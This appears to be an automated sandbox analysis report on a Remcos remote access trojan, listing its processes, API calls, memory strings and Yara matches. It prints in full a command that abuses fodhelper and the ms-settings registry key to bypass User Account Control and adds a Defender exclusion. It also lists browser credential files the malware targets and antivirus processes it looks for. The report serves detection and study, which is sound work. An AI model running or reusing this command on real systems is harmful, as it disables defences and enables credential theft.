Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF272B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA, 25_2_00007FF67DF272B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid, 25_2_00007FF67DEF4E98
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\85q3
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\T3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000781000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrasystem.com:
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerN|
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\q3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerP|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\h3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager*|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\
Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerZ3
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\]3
Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager%|
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\\sppsvc.pif|
Source: sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000765000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA24C52 cpuid 28_2_1BA24C52
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 4_2_00007FF789BD51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 4_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 4_2_00007FF789BD3140
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 6_2_00007FF789BD51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 6_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 6_2_00007FF789BD3140
Source: C:\Users\Public\kn.exe Code function: LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary, 25_2_00007FF67DF43800
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: CoInitialize,WinExec,EnumSystemLocalesA, 28_2_028ACE0C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesA, 28_2_028B3AD5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoA, 28_2_1B9FF8D1
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW, 28_2_1BA4230A
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW, 28_2_1BA42313
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW, 28_2_1BA388ED
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW, 28_2_1BA42036
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW, 28_2_1BA41F9B
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW, 28_2_1BA41F50
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 28_2_1BA42610
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW, 28_2_1BA42543
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 28_2_1BA41CD8
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 28_2_1BA4243C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW, 28_2_1BA38404
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 29_2_00007FF789BD51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 29_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 29_2_00007FF789BD3140
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 36_2_029A5A3C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 36_2_029BCE0C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoA, 36_2_029AA6F8
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoA, 36_2_029AA744
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 36_2_029C3AD6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 36_2_029A5B48
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW, 36_2_210B2036
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 36_2_210B20C3
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW, 36_2_210B2313
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW, 36_2_210B2543
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW, 36_2_210A8404
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 36_2_210B243C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 36_2_210B2610
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoA, 36_2_2106F8D1
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW, 36_2_210A88ED
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 36_2_210B1CD8
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW, 36_2_210B1F50
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW, 36_2_210B1F9B
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 4_2_00007FF789BC6EE4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE98018 GetUserNameExW,GetLastError,#357,wcschr,TranslateNameW,GetLastError,#359,#145,GetLastError,#73,#357,#208,#36,#26,GetLastError,#140,#357,LocalFree,#41,#224,#13, 25_2_00007FF67DE98018
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA39365 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 28_2_1BA39365
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC586C GetVersion, 4_2_00007FF789BC586C
Source: C:\Users\Public\xkn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 36_2_2106BA12
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: \key3.db 36_2_2106BB30

Remote Access Functionality

Source: C:\Users\Public\Libraries\sppsvc.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: cmd.exe 36_2_2106569A
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE75648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW, 25_2_00007FF67DE75648
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE554A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree, 25_2_00007FF67DE554A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree, 25_2_00007FF67DE6E568
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree, 25_2_00007FF67DE5227C